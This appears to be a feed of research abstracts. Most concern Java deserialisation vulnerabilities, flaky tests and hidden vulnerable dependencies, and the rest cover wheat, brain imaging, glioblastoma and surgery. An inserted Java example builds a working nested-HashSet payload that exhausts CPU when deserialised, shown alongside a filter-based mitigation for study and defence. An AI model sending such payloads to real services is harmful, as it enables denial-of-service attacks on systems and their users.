
    Security analyses for detecting deserialisation vulnerabilities : a thesis presented in partial fulfilment of the requirements for the degree of Doctor of Philosophy in Computer Science at Massey University, Palmerston North, New Zealand

    An important task in software security is to identify potential vulnerabilities. Attackers exploit security vulnerabilities in systems to obtain confidential information, to breach system integrity, and to make systems unavailable to legitimate users. In recent years, particularly 2012, there has been a rise in reported Java vulnerabilities. One type of vulnerability involves (de)serialisation, a commonly used feature to store objects or data structures in an external format and restore them. In 2015, a deserialisation vulnerability was reported involving Apache Commons Collections, a popular Java library, which affected numerous Java applications. Another major deserialisation-related vulnerability, affecting 55% of Android devices, was reported in 2015. Both of these vulnerabilities allowed arbitrary code execution on vulnerable systems by malicious users, a serious risk, and this came as a call for the Java community to issue patches fixing serialisation-related vulnerabilities in both the Java Development Kit and libraries. Despite attention to coding guidelines and defensive strategies, deserialisation remains a risky feature and a potential weakness in object-oriented applications. In fact, deserialisation-related vulnerabilities (both denial-of-service and remote code execution) continue to be reported for Java applications. Further, deserialisation is a case of parsing, where external data is converted from its external representation into a program's internal data structures; hence, similar vulnerabilities can be present in parsers for file formats and serialisation languages. The problem is, given a software package, to detect either injection or denial-of-service vulnerabilities and to propose strategies to prevent attacks that exploit them. The research reported in this thesis casts detecting deserialisation-related vulnerabilities as a program analysis task. The goal is to automatically discover this class of vulnerabilities using program analysis techniques, and to experimentally evaluate the efficiency and effectiveness of the proposed methods on real-world software. We use multiple techniques to detect reachability to sensitive methods, and taint analysis to detect whether untrusted user input can result in security violations. Challenges in using program analysis for detecting deserialisation vulnerabilities include addressing soundness issues in analysing dynamic features of Java (e.g., native code). Another hurdle is that available techniques mostly target the analysis of applications rather than library code. In this thesis, we develop techniques to address soundness issues related to analysing Java code that uses serialisation, and we adapt dynamic techniques such as fuzzing to address precision issues in the results of our analysis. We also use the results from our analysis to study libraries in other languages, and check whether they are vulnerable to deserialisation-type attacks. We then discuss mitigation measures for engineers to protect their software against such vulnerabilities. In our experiments, we show that we can find unreported vulnerabilities in Java code, and that these vulnerabilities are also present in widely used serialisers for popular languages such as JavaScript, PHP and Rust. In our study, we discovered previously unknown denial-of-service security bugs in applications and libraries that parse external data formats such as YAML, PDF and SVG.

    Flaky Test Sanitisation via On-the-Fly Assumption Inference for Tests with Network Dependencies

    Flaky tests cause significant problems, as they can interrupt automated build processes that rely on all tests succeeding and undermine the trustworthiness of tests. Numerous causes of test flakiness have been identified, and program analyses exist to detect such tests. Typically, these methods produce advice to developers on how to refactor tests in order to make test outcomes deterministic. We argue that one source of flakiness is the lack of assumptions that precisely describe under which circumstances a test is meaningful. We devise a sanitisation technique that can isolate flaky tests quickly by inferring such assumptions on the fly, allowing automated builds to proceed as flaky tests are ignored. We demonstrate this approach for Java and Groovy programs by implementing it as extensions for three popular testing frameworks (JUnit4, JUnit5 and Spock) that can transparently inject the inferred assumptions. If JUnit5 is used, those extensions can be deployed without refactoring project source code. We demonstrate and evaluate the utility of our approach using a set of six popular real-world programs, addressing known test flakiness issues in these programs caused by dependencies of tests on network availability. We find that our method effectively sanitises failures induced by network connectivity problems with high precision and recall.
    Comment: to appear at IEEE International Working Conference on Source Code Analysis and Manipulation (SCAM
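
    A simplified illustration of the injected-assumption idea for JUnit5, added here as an example; it is not the paper's implementation, which infers the assumptions on the fly rather than matching a fixed list of exception types. The extension hooks JUnit's exception-handling extension point and reclassifies a failure rooted in a connectivity error as a violated assumption, so the test is reported as aborted rather than failed and a build that requires all tests to pass can proceed. The names NetworkAssumptionExtension, findNetworkCause and RemoteResourceTest, the set of exception types treated as "network unavailable", and the example URL are the editor's choices, not the paper's.

```java
import java.io.IOException;
import java.net.ConnectException;
import java.net.SocketTimeoutException;
import java.net.URI;
import java.net.UnknownHostException;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import org.junit.jupiter.api.extension.ExtensionContext;
import org.junit.jupiter.api.extension.TestExecutionExceptionHandler;
import org.opentest4j.TestAbortedException;

/**
 * JUnit 5 extension that turns a test failure caused by an unreachable network into a
 * violated assumption: JUnit records the test as aborted (the same outcome as
 * Assumptions.assumeTrue(false)), not as failed, so the build is not blocked.
 * Added example; the exception-type heuristic below stands in for the paper's inference.
 */
public class NetworkAssumptionExtension implements TestExecutionExceptionHandler {

    @Override
    public void handleTestExecutionException(ExtensionContext context, Throwable failure)
            throws Throwable {
        Throwable networkCause = findNetworkCause(failure);
        if (networkCause != null) {
            // Inject the assumption after the fact: "this test assumes the network is reachable".
            throw new TestAbortedException(
                "Inferred assumption violated (network reachable) in "
                    + context.getDisplayName() + ": " + networkCause,
                failure);
        }
        throw failure; // every other failure is genuine: rethrow so JUnit reports it
    }

    /** Walks the cause chain for a connectivity error; returns null if there is none. */
    static Throwable findNetworkCause(Throwable failure) {
        Throwable t = failure;
        for (int i = 0; t != null && i < 32; i++) { // bounded walk: guards against cyclic causes
            if (t instanceof UnknownHostException
                    || t instanceof ConnectException
                    || t instanceof SocketTimeoutException) {
                return t;
            }
            t = t.getCause();
        }
        return null;
    }
}

/** A network-dependent test; the annotation registers the extension explicitly. */
@ExtendWith(NetworkAssumptionExtension.class)
class RemoteResourceTest {

    @Test
    void fetchesRemoteDocument() throws IOException {
        // Online this passes; offline the DNS lookup throws UnknownHostException and the
        // extension aborts the test instead of failing it.
        URI.create("https://example.com/").toURL().openStream().close();
    }
}
```

    To deploy the extension without touching project sources, as the abstract describes for JUnit5, register it through JUnit's automatic extension registration instead of the annotation: list the class in META-INF/services/org.junit.jupiter.api.extension.Extension and set junit.jupiter.extensions.autodetection.enabled=true in junit-platform.properties. The heuristic here trades precision for simplicity: a ConnectException caused by a misconfigured port in the code under test would also be reported as aborted, which is exactly the kind of false positive the paper's inferred assumptions are meant to avoid.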

    On the Security Blind Spots of Software Composition Analysis

    Modern software relies heavily on the use of components. Those components are usually published in central repositories and managed by build systems via dependencies. Due to issues around vulnerabilities, licences and the propagation of bugs, the study of those dependencies is of utmost importance, and numerous software composition analysis tools have emerged to address those issues. A particular challenge is hidden dependencies that are the result of cloning or shading, where code from a component is "inlined" and, in the case of shading, moved to different namespaces. We present an approach to detect cloned and shaded artifacts in the Maven repository. Our approach is lightweight in that it does not require the creation and maintenance of an index, and it uses a custom AST-based clone detection. Our analysis focuses on the detection of vulnerabilities in artifacts which use cloning or shading. Starting with eight vulnerabilities with assigned CVEs (four of those classified as critical) and proof-of-vulnerability projects demonstrating the presence of a vulnerability in an artifact, we query the Maven repository and retrieve over 16k potential clones of the vulnerable artifacts. After running our analysis on this set, we detect 554 artifacts with the respective vulnerabilities (49 if versions are ignored). We synthesise a testable proof-of-vulnerability project for each of those. We demonstrate that existing SCA tools often miss these exposures.
    Comment: 16 pages, 1 figure

    Evil Pickles: DoS Attacks Based on Object-Graph Engineering (Artifact)

    This artefact demonstrates the effects of the serialisation vulnerabilities described in the companion paper. It is composed of three components: scripts, including source code, for Java, Ruby and C# serialisation vulnerabilities; two case studies that demonstrate attacks based on the vulnerabilities; and a contracts-based mitigation strategy for serialisation-based attacks on Java applications. The artefact allows users to witness how the serialisation-based vulnerabilities result in behaviour that can be used in security attacks. It also supports the repeatability of the case study experiments and the benchmark for the mitigation measures proposed in the paper. Instructions for running the tasks are provided along with a description of the artefact setup.

    Evil Pickles: DoS Attacks Based on Object-Graph Engineering

    In recent years, multiple vulnerabilities exploiting the serialisation APIs of various programming languages, including Java, have been discovered. These vulnerabilities can be used to devise injection attacks, exploiting the presence of dynamic programming language features like reflection or dynamic proxies. In this paper, we investigate a new type of serialisation-related vulnerability for Java that exploits the topology of object graphs constructed from classes of the standard library in such a way that deserialisation leads to resource exhaustion, facilitating denial-of-service attacks. We analyse three such vulnerabilities that can be exploited to exhaust stack memory, heap memory and CPU time. We discuss the language and library design features that enable these vulnerabilities, and investigate whether these vulnerabilities can be ported to C#, JavaScript and Ruby. We present two case studies that demonstrate how the vulnerabilities can be used in attacks on two widely used servers, Jenkins deployed on Tomcat and JBoss. Finally, we propose a mitigation strategy based on contract injection.
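
    The CPU-time variant of object-graph engineering, as an added example that is not code from the paper or its artefact (which also covers the stack- and heap-exhaustion variants, not shown here). The graph is the publicly known nested-HashSet shape built from java.util.HashSet only: every level holds two sets that share the same pair of children, so ObjectOutputStream writes each set once and the stream grows linearly with depth, while HashSet.readObject re-inserts every element and AbstractSet.hashCode recurses into the children, so the receiver's work roughly doubles per level. The mitigation shown is the JDK's own ObjectInputFilter (JEP 290, Java 9 and later), not the contract-injection strategy the paper proposes; the class and method names (SerialDosDemo, buildPayload, serialise, deserialise) and the depth and reference limits are the editor's choices.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashSet;
import java.util.Set;

/**
 * Added example: a small serialised stream whose deserialisation costs CPU time
 * exponential in the nesting depth. Shared children are written once (back-references),
 * so the payload stays small; on the receiving side HashSet.readObject re-hashes each
 * element and AbstractSet.hashCode recurses, so hash work is about 2^depth.
 */
public class SerialDosDemo {

    /** Builds a chain of HashSets 'depth' levels deep; each level shares its two children. */
    static Set<Object> buildPayload(int depth) {
        Set<Object> root = new HashSet<>();
        Set<Object> s1 = root;
        Set<Object> s2 = new HashSet<>();
        for (int i = 0; i < depth; i++) {
            Set<Object> t1 = new HashSet<>();
            Set<Object> t2 = new HashSet<>();
            t1.add("x");   // keeps t1 unequal to t2, so both remain distinct members
            s1.add(t1);
            s1.add(t2);
            s2.add(t1);
            s2.add(t2);
            s1 = t1;       // descend: the next level hangs off both t1 and t2
            s2 = t2;
        }
        return root;
    }

    static byte[] serialise(Object graph) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(graph);
        }
        return bos.toByteArray();
    }

    /**
     * Deserialises 'bytes', optionally under a JEP 290 filter. Returns elapsed
     * milliseconds, or -1 if the filter rejected the stream (InvalidClassException).
     */
    static long deserialise(byte[] bytes, ObjectInputFilter filter)
            throws IOException, ClassNotFoundException {
        long start = System.nanoTime();
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            if (filter != null) {
                ois.setObjectInputFilter(filter); // must be set before the first readObject
            }
            ois.readObject();
        } catch (InvalidClassException rejected) {
            return -1;
        }
        return (System.nanoTime() - start) / 1_000_000;
    }

    public static void main(String[] args) throws Exception {
        // Depth 20 is a fraction of a second on ordinary hardware; each additional level
        // roughly doubles the time while adding only a few dozen bytes to the stream.
        int depth = args.length > 0 ? Integer.parseInt(args[0]) : 20;
        byte[] payload = serialise(buildPayload(depth));
        System.out.printf("depth=%d, stream size=%d bytes%n", depth, payload.length);

        long unfiltered = deserialise(payload, null);
        System.out.printf("unfiltered readObject: %d ms%n", unfiltered);

        // Mitigation: bound nesting depth and object count. The check runs while the stream
        // is being descended, before any nested readObject completes, so the hash work never
        // happens. The limits here are illustrative (editor's assumption), not a recommendation.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter("maxdepth=8;maxrefs=500");
        long filtered = deserialise(payload, filter);
        System.out.println(filtered < 0
            ? "filtered readObject: rejected by the depth/reference limit"
            : "filtered readObject: " + filtered + " ms");
    }
}
```

    Run it as java SerialDosDemo 24 (or higher) to watch the deserialisation time grow while the stream stays at a couple of kilobytes; stop well short of 30 unless you want to tie up a core for minutes. A depth or reference bound alone is coarse; in practice the same filter string should also allow-list the expected classes and end with !* so that unexpected classes are rejected outright, and the filter should be installed process-wide (the jdk.serialFilter system property) rather than per stream, since the vulnerable code path is any ObjectInputStream that reads attacker-controlled bytes.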

    Root and canopy traits and adaptability genes explain drought tolerance responses in winter wheat

    Bread wheat (Triticum aestivum L.) is one of the three main staple crops worldwide, contributing 20% of calories in the human diet. Drought stress is the main factor limiting yields and threatening food security, with climate change resulting in more frequent and intense drought. Developing drought-tolerant wheat cultivars is a promising way forward. The use of holistic approaches that include high-throughput phenotyping and genetic markers in selection could help in accelerating genetic gains. Fifty advanced breeding lines were selected from the CIMMYT Turkey winter wheat breeding program and studied under irrigated and semiarid conditions over two years. High-throughput phenotyping was done for wheat crown root traits and canopy senescence dynamics using vegetation indices (green area using RGB images and Normalized Difference Vegetation Index using spectral reflectance). In addition, genotyping by KASP markers for adaptability genes was done. Overall, under semiarid conditions yield was reduced by 3.09 t ha⁻¹ (-46.8%) compared to irrigated conditions. Genotypes responded differently under drought stress, and genotypes 39 (VORONA/HD24-12//GUN/7/VEE#8//.../8/ALTAY), 18 (BiII98) and 29 (NIKIFOR//KROSHKA) were the most drought tolerant. Root traits including shallow nodal root angle under irrigated conditions and root number per shoot under semiarid conditions were correlated with increased grain yield (GY). The RGB-based vegetation index measuring canopy green area at anthesis was more strongly correlated with GY than NDVI was under drought. The markers for five established functional genes (PRR73.A1, flowering time; TEF-7A, grain size and weight; TaCwi.4A, yield under drought; Dreb1, drought tolerance; and ISBW11.GY.QTL.CANDIDATE, grain yield) were associated with different drought-tolerance traits in this experiment. We conclude that genotypes 39, 18 and 29 could be used for drought tolerance breeding. The trait combination of canopy green area at anthesis and root number per shoot, along with key drought adaptability markers (TaCwi.4A and Dreb1), could be used in screening wheat breeding lines for drought tolerance.

    Microvessel stenosis, enlarged perivascular spaces, and fibrinogen deposition are associated with ischemic periventricular white matter hyperintensities

    Periventricular white matter hyperintensities (pvWMH) are neuroimaging abnormalities surrounding the lateral ventricles that are apparent on magnetic resonance imaging (MRI). They are associated with age, neurodegenerative disease, and cerebrovascular risk factors. While pvWMH ultimately represent a loss of white matter structural integrity, the pathological causes are heterogeneous in nature and currently cannot be distinguished using neuroimaging alone. pvWMH could occur because of a combination of small vessel disease (SVD), ependymal loss, blood–brain barrier (BBB) dysfunction, and microgliosis. In this study we aimed to characterize microvascular stenosis, fibrinogen extravasation, and microgliosis within pvWMH with and without imaging evidence of periventricular infarction. Using postmortem neuroimaging of human brains (n = 20), we identified pvWMH with and without periventricular infarcts (PVI). We performed histological analysis of microvessel stenosis, perivascular spaces, and microgliosis, and immunohistochemistry (IHC) against fibrinogen as a measure of serum protein extravasation. Herein, we report distinctions between pvWMH with and without periventricular infarcts based on associations with microvessel stenosis, enlarged perivascular spaces, and fibrinogen IHC. Microvessel stenosis was significantly associated with PVI and with cellular deposition of fibrinogen in the white matter. The presence of fibrinogen was associated with PVI and an increased number of microglia. These findings suggest that neuroimaging-based detection of infarction within pvWMH may help distinguish more severe lesions, associated with underlying microvascular disease and BBB dysfunction, from milder pvWMH that are a highly frequent finding on MRI.

    Proteomic profiling of patient-derived glioblastoma xenografts identifies a subset with activated EGFR: implications for drug development

    The development of drugs to inhibit glioblastoma (GBM) growth requires reliable preclinical models. To date, proteomic-level validation of widely used patient-derived glioblastoma xenografts (PDGX) has not been performed. In the present study, we characterized 20 PDGX models according to subtype classification based on The Cancer Genome Atlas (TCGA) criteria, TP53, PTEN, IDH1/2 and TERT promoter genetic analysis, and EGFR amplification status, and examined their proteomic profiles against those of their parent tumors. The 20 PDGXs belonged to three of the four TCGA subtypes: 8 classical, 8 mesenchymal, and 4 proneural; none were neural. Amplification of the EGFR gene was observed in 9 out of 20 xenografts, and of these, 3 harbored the EGFRvIII mutation. We then performed proteomic profiling of the PDGX, analyzing the expression and activity of several proteins including EGFR. Levels of EGFR phosphorylated at Y1068 vary considerably between PDGX samples, and this pattern was also seen in primary GBM. Partitioning the 20 PDGX into high (n=5) and low (n=15) groups identified a panel of proteins associated with high EGFR activity. Thus, PDGX with high EGFR activity represent an excellent preclinical model to develop therapies for the subset of GBM patients whose tumors are characterized by high EGFR activity. Further, the proteins found to be associated with high EGFR activity can be monitored to assess the effectiveness of targeting EGFR.

    Reducing the environmental impact of surgery on a global scale: systematic review and co-prioritization with healthcare workers in 132 countries

    Background: Healthcare cannot achieve net-zero carbon without addressing operating theatres. The aim of this study was to prioritize feasible interventions to reduce the environmental impact of operating theatres.
    Methods: This study adopted a four-phase Delphi consensus co-prioritization methodology. In phase 1, a systematic review of published interventions and a global consultation of perioperative healthcare professionals were used to longlist interventions. In phase 2, iterative thematic analysis consolidated comparable interventions into a shortlist. In phase 3, the shortlist was co-prioritized based on patient and clinician views on acceptability, feasibility, and safety. In phase 4, ranked lists of interventions were presented by their relevance to high-income countries and low–middle-income countries.
    Results: In phase 1, 43 interventions were identified, which had low uptake in practice according to 3042 professionals globally. In phase 2, a shortlist of 15 intervention domains was generated. In phase 3, interventions were deemed acceptable by more than 90 per cent of patients, except for reducing general anaesthesia (84 per cent) and re-sterilization of 'single-use' consumables (86 per cent). In phase 4, the top three shortlisted interventions for high-income countries were: introducing recycling; reducing use of anaesthetic gases; and appropriate clinical waste processing. The top three shortlisted interventions for low–middle-income countries were: introducing reusable surgical devices; reducing use of consumables; and reducing the use of general anaesthesia.
    Conclusion: This is a step toward environmentally sustainable operating environments with actionable interventions applicable to both high-income and low–middle-income countries.